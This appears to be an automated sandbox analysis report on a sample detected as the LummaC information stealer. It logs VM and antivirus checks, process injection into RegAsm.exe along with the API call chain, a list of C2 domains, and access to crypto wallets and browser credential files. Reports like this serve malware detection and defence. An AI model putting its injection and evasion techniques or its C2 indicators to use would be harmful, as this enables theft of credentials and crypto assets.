Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 5_6253708004881862888.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 5_6253708004881862888.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 5_6253708004881862888.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 5_6253708004881862888.exe

Static PE information: section name: .text entropy: 7.995899101105081

Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory allocated: 1390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory allocated: 2F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory allocated: 1520000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe TID: 4504	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6944	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000008.00000002.1903985717.0000000001006000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.1903985717.000000000103A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_8-15444

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_0043D1C0 LdrInitializeThunk,

8_2_0043D1C0

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Code function: 4_2_02F7217D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

4_2_02F7217D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: 5_6253708004881862888.exe, 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: muggudrowiwm.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 441000	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000	Jump to behavior
Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A13008	Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\5_6253708004881862888.exe	Queries volume information: C:\Users\user\Desktop\5_6253708004881862888.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 5_6253708004881862888.exe, 00000004.00000002.1273017065.0000000001184000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: 5_6253708004881862888.exe, 00000004.00000002.1273017065.0000000001184000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1412, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000008.00000002.1903985717.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: RegAsm.exe, 00000008.00000002.1903985717.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegAsm.exe, 00000008.00000002.1903985717.000000000103A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000008.00000002.1903985717.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: RegAsm.exe, 00000008.00000002.1904233183.000000000108E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
